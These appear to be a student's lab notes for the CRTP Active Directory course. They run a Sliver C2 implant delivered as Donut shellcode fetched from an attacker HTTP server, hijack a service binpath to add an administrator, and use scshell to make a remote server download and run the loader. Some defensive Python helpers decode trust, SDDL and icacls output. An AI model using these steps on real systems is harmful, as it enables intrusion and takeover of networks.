CRTP SLIVER
On the client machine (RDP'd in):
C:\Windows\system32>cd c:\ad\tools\sliver
c:\AD\Tools\Sliver>binloader 172.16.99.98 8080 std98mtls.bin
[+] Getting shellcode
[+] Allocating memory
[+] Executing...
[+] Check for session!
Serve the .bin file; the implant was generated with:
[server] sliver (std98mtls) > generate --mtls 172.16.99.98 --os windows --arch amd64 --format exe -G --skip-symbols -N std98_mtls -s ./Implants/std98_mtls.exe
and converted to shellcode with Donut:
┌──(puck㉿kali)-[~/donut_v0.9.3]
└─$ ./donut std98mtls.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "std98mtls.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(puck㉿kali)-[~/donut_v0.9.3]
└─$ mv loader.bin std98mtls.bin
┌──(puck㉿kali)-[~/CRTP/Sliver/Implants]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
172.16.100.98 - - [11/Dec/2025 08:04:01] "GET /std98mtls.bin HTTP/1.1" 200 -
Start Sliver:
┌──(puck㉿kali)-[~/CRTP/Sliver]
└─$ ./sliver-server
[*] Loaded 22 aliases from disk
[*] Loaded 152 extension(s) from disk
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - Dirty
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
[server] sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
[server] sliver > https
[*] Starting HTTPS :443 listener ...
[*] Successfully started job #2
[server] sliver > sessions
[*] No sessions 🙁
[*] Session e23550fd std98mtls - 172.16.100.98:50675 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:42 CET
[*] Session e43416e3 std98mtls - 172.16.100.98:50676 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:42 CET
[*] Session de5da6bb std98mtls - 172.16.100.98:50677 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:46 CET
[server] sliver > use e23550fd-f5ef-4d94-a2d0-7c0283260a51
[*] Active session std98mtls (e23550fd-f5ef-4d94-a2d0-7c0283260a51)
[server] sliver (std98mtls) > whoami
Logon ID: dcorp\student98
[*] Current Token ID: dcorp\student98
[server] sliver (std98mtls) >
commands
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] gplink : [LDAP://cn={0BF8D01C-1F62-4BDC-958C-57140B67D147},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/ADSearch.exe '--search "(&(objectCategory=groupPolicyContainer)(|(name={0BF8D01C-1F62-4BDC-958C-57140B67D147})))" --attributes displayname'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ___________/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / / / /__/ / / /
/_/ |_/_____//____/\___/\__,_/_/ \___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] displayname : DevOps Policy
[server] sliver (std98mtls) >
LO4
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/dsquery.exe '* "CN=Partitions,CN=Configuration,DC=moneycorp,DC=local" -filter "(nETBIOSName=*)" -attr ncname'
[*] Output:
Records Found: 3
ncname
DC=dollarcorp,DC=moneycorp,DC=local
DC=moneycorp,DC=local
DC=us,DC=dollarcorp,DC=moneycorp,DC=local
DONE
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/ADSearch.exe '-d dollarcorp.moneycorp.local --search "(objectClass=trustedDomain)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'
[*] Output:
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 3
[
{
"cn": "moneycorp.local",
"flatName": "mcorp",
"name": "moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustDirection": 3,
"trustPartner": "moneycorp.local"
},
{
"cn": "us.dollarcorp.moneycorp.local",
"flatName": "US",
"name": "us.dollarcorp.moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustDirection": 3,
"trustPartner": "us.dollarcorp.moneycorp.local"
},
{
"cn": "eurocorp.local",
"flatName": "ecorp",
"name": "eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 4,
"trustDirection": 3,
"trustPartner": "eurocorp.local"
}
]
[server] sliver (std98mtls) >
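The trustAttributes and trustDirection values in that JSON are bitmasks and enums; the decoder below is an added example (not part of these notes or of ADSearch) that turns them into the assessment a defender wants: trust type, direction and whether SID filtering is on. Bit values follow MS-ADTS; the sample input is the ADSearch output above, trimmed to the relevant attributes.

```python
import json

# Bit values of the trustAttributes LDAP attribute (MS-ADTS 6.1.6.7.9).
TRUST_ATTRIBUTE_FLAGS = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",  # SID filtering (quarantine) enforced
    0x008: "FOREST_TRANSITIVE",
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",       # parent/child or tree-root trust
    0x040: "TREAT_AS_EXTERNAL",
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}

def decode_trust(entry):
    """Translate one trustedDomain object into a readable assessment."""
    attrs = int(entry["trustAttributes"])
    flags = [name for bit, name in TRUST_ATTRIBUTE_FLAGS.items() if attrs & bit]
    if attrs & 0x20:
        kind = "intra-forest"   # same forest: the forest, not the domain, is the boundary
    elif attrs & 0x08:
        kind = "forest"
    else:
        kind = "external"
    return {
        "partner": entry["trustPartner"],
        "netbios": entry["flatName"],
        "direction": TRUST_DIRECTION.get(int(entry["trustDirection"]), "UNKNOWN"),
        "kind": kind,
        "flags": flags,
        "sid_filtering": bool(attrs & 0x04),
        "transitive": not (attrs & 0x01),
    }

def summarize_trusts(json_text):
    return [decode_trust(e) for e in json.loads(json_text)]

# The three trustedDomain objects returned by the ADSearch query above (trimmed).
SAMPLE = """[
 {"cn": "moneycorp.local", "flatName": "mcorp", "name": "moneycorp.local",
  "trustAttributes": 32, "trustDirection": 3, "trustPartner": "moneycorp.local"},
 {"cn": "us.dollarcorp.moneycorp.local", "flatName": "US", "name": "us.dollarcorp.moneycorp.local",
  "trustAttributes": 32, "trustDirection": 3, "trustPartner": "us.dollarcorp.moneycorp.local"},
 {"cn": "eurocorp.local", "flatName": "ecorp", "name": "eurocorp.local",
  "trustAttributes": 4, "trustDirection": 3, "trustPartner": "eurocorp.local"}
]"""

if __name__ == "__main__":
    for t in summarize_trusts(SAMPLE):
        print(f"{t['partner']:<32} {t['kind']:<12} {t['direction']:<14} "
              f"sid_filtering={t['sid_filtering']} flags={','.join(t['flags'])}")
```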
LO5
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/SharpUp.exe 'audit'
[*] Output:
=== SharpUp: Running Privilege Escalation Checks ===
[*] In medium integrity but user is a local administrator- UAC can be bypassed.
[*] Audit mode: running an additional 15 check(s).
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Modifiable Services ===
Service 'AbyssWebServer' (State: Stopped, StartMode: Auto)
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
Service 'SNMPTRAP' (State: Running, StartMode: Auto)
[*] Completed Privesc Checks in 19 seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Seatbelt.exe '-group=System'
<snip>
====== Services ======
Non Microsoft Services (via WMI)
Name                                      : ssh-agent
DisplayName                               : OpenSSH Authentication Agent
Description                               : Agent to hold private keys used for public key authentication.
User                                      : LocalSystem
State                                     : Stopped
StartMode                                 : Disabled
ServiceType                               : Own Process
ServiceCommand                            : C:\Windows\System32\OpenSSH\ssh-agent.exe
BinaryPath                                : C:\Windows\System32\OpenSSH\ssh-agent.exe
BinaryPathSDDL                            : O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:PAI(A;;0x1200a9;;;SY)(A;;0x1200a9;;;BA)(A;;0x1200a9;;;BU)(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;0x1200a9;;;AC)(A;;0x1200a9;;;S-1-15-2-2)
ServiceDll                                :
ServiceSDDL                               : O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RP;;;AU)
<snip>
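The ServiceSDDL line in that Seatbelt output is what decides who may rewrite a service definition, which is the property SharpUp's modifiable-services check looks for and the sc-config / scshell commands in these notes depend on. The decoder below is an added example (not part of the notes or of Seatbelt): it parses service SDDL, names the service-specific rights, and reports Allow ACEs that grant config-change rights to anyone other than SYSTEM or Administrators. The first SDDL is the ssh-agent one above; the second is a constructed weak example.

```python
import re

# Service-specific access right codes as written in service SDDL strings.
SERVICE_RIGHTS = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
WELL_KNOWN = {
    "SY": "Local System", "BA": "Builtin Administrators", "IU": "Interactive",
    "SU": "Service", "AU": "Authenticated Users", "BU": "Builtin Users",
    "WD": "Everyone", "AC": "All Application Packages",
}
# Rights that allow rewriting the service definition or its security descriptor.
TAKEOVER_RIGHTS = {"DC", "WD", "WO", "SD", "GA", "GW"}
TRUSTED = {"SY", "BA"}
ACE_RE = re.compile(r"\((\w+);([^;]*);([^;]*);([^;]*);([^;]*);([^)]+)\)")

def parse_service_sddl(sddl):
    """Return the DACL as a list of {type, principal, sid, rights} dicts."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    aces = []
    for ace_type, _flags, rights, _obj, _inh, sid in ACE_RE.findall(dacl):
        # rights is a run of two-letter codes (a hex mask is kept as one token)
        codes = [rights] if rights.startswith("0x") else re.findall(r"..", rights)
        aces.append({"type": ace_type, "principal": WELL_KNOWN.get(sid, sid),
                     "sid": sid, "rights": codes})
    return aces

def modifiable_by_non_admins(sddl):
    """Allow-ACEs granting takeover rights to anything other than SYSTEM/Administrators."""
    hits = []
    for ace in parse_service_sddl(sddl):
        if ace["type"] != "A" or ace["sid"] in TRUSTED:
            continue
        bad = sorted(set(ace["rights"]) & TAKEOVER_RIGHTS)
        if bad:
            hits.append((ace["principal"], [SERVICE_RIGHTS[r] for r in bad]))
    return hits

# ServiceSDDL of ssh-agent as reported by Seatbelt above.
SSH_AGENT_SDDL = ("O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                  "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RP;;;AU)")
# Constructed example of a misconfigured service: Authenticated Users hold CHANGE_CONFIG.
WEAK_SDDL = "O:SYD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)"

if __name__ == "__main__":
    for name, sddl in (("ssh-agent", SSH_AGENT_SDDL), ("constructed", WEAK_SDDL)):
        print(name, modifiable_by_non_admins(sddl) or "no non-admin takeover rights")
```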
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Stracciatella.exe '-c "icacls abyssws.exe"'
[*] Output:
abyssws.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Stracciatella.exe '-c "icacls c:\webserver"'
[*] Output:
c:\webserver NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
[server] sliver (std98mtls) >
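The two icacls listings above are the permission facts behind the AbyssWebServer finding: the service binary is writable by Everyone, and the service directory lets Users create files (AD) and subdirectories (WD). The helper below is an added example (not from these notes) that parses such listings and flags write rights held by low-privileged groups; it assumes the path on the first icacls line contains no spaces, which holds for both listings.

```python
import re

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([A-Z,]+\))+)$")
# icacls rights/flags that let the holder replace the file or add to the directory.
WRITE_FLAGS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}
# Groups every domain user ends up in.
LOW_PRIV = {"Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users",
            r"NT AUTHORITY\INTERACTIVE"}

def parse_icacls(text):
    """Parse one icacls listing into (path, [(principal, [flags]), ...]).
    Assumes the path on the first line contains no spaces (true above)."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    path, first_ace = lines[0].split(None, 1)
    aces = []
    for line in [first_ace] + lines[1:]:
        if line.startswith("Successfully processed"):
            break
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed icacls line: {line!r}")
        # "(OI)(CI)(RX,W)" -> ["OI", "CI", "RX", "W"]
        flags = [f for grp in re.findall(r"\(([A-Z,]+)\)", m["flags"]) for f in grp.split(",")]
        aces.append((m["principal"], flags))
    return path, aces

def writable_by_low_priv(text):
    """ACEs granting a low-privileged group write rights on the listed object."""
    _path, aces = parse_icacls(text)
    return [(p, f) for p, f in aces if p in LOW_PRIV and set(f) & WRITE_FLAGS]

# icacls output captured above for the AbyssWebServer binary and its directory.
ABYSSWS_EXE = r"""abyssws.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files"""
WEBSERVER_DIR = r"""c:\webserver NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for listing in (ABYSSWS_EXE, WEBSERVER_DIR):
        path, _ = parse_icacls(listing)
        for principal, flags in writable_by_low_priv(listing):
            print(f"{path}: {principal} has {'/'.join(flags)}")
```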
[server] sliver (std98mtls) > remote-sc-config -t 100 "" 'AbyssWebServer' 'C:\windows\system32\net.exe localgroup administrators dcorp\student98 /add ' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
servicename: AbyssWebServer
binpath: C:\windows\system32\net.exe localgroup administrators dcorp\student98 /add
ignoremode: 1
startmode: 2
SUCCESS.
[server] sliver (std98mtls) > remote-sc-stop -t 100 "" 'AbyssWebServer'
[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
Service is already stopped.
SUCCESS.
[server] sliver (std98mtls) > remote-sc-start -t 100 "" 'AbyssWebServer'
[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service failed: 41D
start_service:
hostname:
servicename: AbyssWebServer
StartServiceA failed (41D)
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/LACheck.exe 'winrm /ldap:servers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'
[*] Output:
[+] Parsed Aguments:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: False
/registry: False
/services: False
/ldap: servers-exclude-dc
/ou:
/socket:
/targets:
/threads: 10
/user: student98@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 26
Status: (0.00%) 0 computers finished (+0) -- Using 25 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as student98@dollarcorp.moneycorp.local
[+] Finished enumerating hosts
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c basic_info'
[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from basic_info:
Computer Name : DCORP-ADMINSRV
Windows Directory : C:\Windows
Operating System : Microsoft Windows Server 2022 Datacenter
Version : 10.0.20348
Manufacturer : Microsoft Corporation
Number of Users : 7
Registered User : Windows User
[+] Successfully completed basic_info command
Execution time: 0 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c command_exec --execute "$ExecutionContext.SessionState.LanguageMode"'
[*] Output:
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from command_exec:
[+] Executing command: $ExecutionContext.SessionState.LanguageMode
--------------------------------------------------------
ConstrainedLanguage
[+] Successfully completed command_exec command
Execution time: 7 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c command_exec --execute "Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse"'
[*] Output:
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from command_exec:
[+] Executing command: Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
--------------------------------------------------------
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2

Name                                  Property
----                                  --------
Appx                                  AllowWindows : 0
Dll                                   AllowWindows : 0
Exe                                   AllowWindows : 0

Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe

Name                                  Property
----                                  --------
38a711c4-c0b8-46ee-98cf-c9636366548e  Value : <FilePublisherRule Id="38a711c4-c0b8-46ee-98cf-c9636366548e" Name="Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="*" HighSection="*"/></FilePublisherCondition></Conditions></FilePublisherRule>

Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2

Name                                  Property
----                                  --------
Msi                                   AllowWindows : 0
Script                                AllowWindows : 0

Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Script

Name                                  Property
----                                  --------
06dce67b-934c-454f-a263-2515c8796a5d  Value : <FilePathRule Id="06dce67b-934c-454f-a263-2515c8796a5d" Name="(Default Rule) All scripts located in the Program Files folder" Description="Allows members of the Everyone group to run scripts that are located in the Program Files folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions></FilePathRule>
8a64fa2c-8c17-415a-8505-44fc7d7810ad  Value : <FilePublisherRule Id="8a64fa2c-8c17-415a-8505-44fc7d7810ad" Name="Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="*" HighSection="*"/></FilePublisherCondition></Conditions></FilePublisherRule>
9428c672-5fc3-47f4-808a-a0011f36dd2c  Value : <FilePathRule Id="9428c672-5fc3-47f4-808a-a0011f36dd2c" Name="(Default Rule) All scripts located in the Windows folder" Description="Allows members of the Everyone group to run scripts that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions></FilePathRule>
[+] Successfully completed command_exec command
Execution time: 3 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'set username & set computername'
[*] Output:
USERNAME=student98
COMPUTERNAME=DCORP-ADMINSRV
[!] Exited with status 6!
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > ifconfig
+-------------------------------------------+
| Ethernet 9 |
+-------------------------------------------+
| # | IP Addresses | MAC Address |
+----+------------------+-------------------+
| 17 | 172.16.100.98/24 | 00:15:5d:fd:78:38 |
+-------------------------------------------+
1 adapters not shown.
[server] sliver (std98mtls) > pivots tcp --lport 8081
[*] Started tcp pivot listener :8081 with id 1
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'hostname'
[*] Output:
dcorp-adminsrv
[!] Exited with status 6!
[server] sliver (std98mtls) >
On the RDP session, in WSL, start python3 -m http.server 80:
wsluser@dcorp-std98:/mnt/c/AD/Tools/Sliver$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
172.16.4.101 - - [11/Dec/2025 03:38:31] "GET /BinLoader.exe HTTP/1.1" 200 -
172.16.4.101 - - [11/Dec/2025 03:39:26] "GET /BinLoader.exe HTTP/1.1" 200 -
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'curl --output C:\windows\temp\BinLoader.exe --url http://172.16.100.98:8080/BinLoader.exe'
[*] Output:
[!] Exited with status 6!
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'dir c:\windows\temp'
[*] Output:
Volume in drive C has no label.
Volume Serial Number is 76D3-EB93
Directory of c:\windows\temp
12/11/2025 03:38 AM <DIR> .
10/25/2024 02:37 AM <DIR> ..
11/11/2022 12:53 AM <DIR> 03ECEA13-6170-4E27-B206-1F40AA2E258E
12/11/2025 03:39 AM 5,120 BinLoader.exe
[server] sliver (std98mtls) > sa-sc-enum dcorp-adminsrv
[server] sliver (std98mtls) > remote-sc-stop -t 100 "dcorp-adminsrv" 'ssh-agent'
[server] sliver (std98mtls) > cd 'c:\ad\tools\sliver'
[server] sliver (std98mtls) > upload Implants\\dcorp-adminsrv_tcp.bin
[*] Wrote file to c:\ad\tools\sliver\Implants\dcorp-adminsrv_tcp.bin
[server] sliver (std98mtls) > scshell -t 80 dcorp-adminsrv ssh-agent 'C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\BinLoader.exe 172.16.100.98 8080 dcorp-adminsrv_tcp.bin'
[*] Successfully executed scshell (coff-loader)
[*] Got output:
Trying to connect to dcorp-adminsrv
SC_HANDLE Manager 0x0000000010fab340
Opening ssh-agent
SC_HANDLE Service 0x0000000010fab220
LPQUERY_SERVICE_CONFIGA need 0x0000014c bytes
Original service binary path "C:\Windows\System32\OpenSSH\ssh-agent.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\BinLoader.exe 172.16.100.98 8080 dcorp-adminsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\System32\OpenSSH\ssh-agent.exe"
[server] sliver (std98mtls) >
Not working from Kali; next: Jenkins.
LO6